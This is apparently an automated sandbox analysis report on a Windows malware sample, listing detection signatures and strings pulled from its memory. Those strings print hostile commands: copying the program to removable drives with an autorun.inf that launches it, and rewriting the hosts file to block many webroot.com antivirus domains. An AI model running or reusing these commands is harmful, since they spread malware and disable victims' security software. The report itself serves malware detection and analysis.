Windows Analysis Report
IPrstVM17M.exe

Overview

General Information

Sample name: IPrstVM17M.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: 3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
Analysis ID: 1430905
MD5: a23b11e50c1f6fcdb42d3b2582524e2f
SHA1: 8b54ea0bc8e4545759e0ea82d28fd608fe0d97ee
SHA256: 3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Queries Google from non browser process on port 80
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: IPrstVM17M.exe ReversingLabs: Detection: 15%
Source: IPrstVM17M.exe Virustotal: Detection: 14% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: IPrstVM17M.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: IPrstVM17M.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: IPrstVM17M.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
May infect USB drives
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 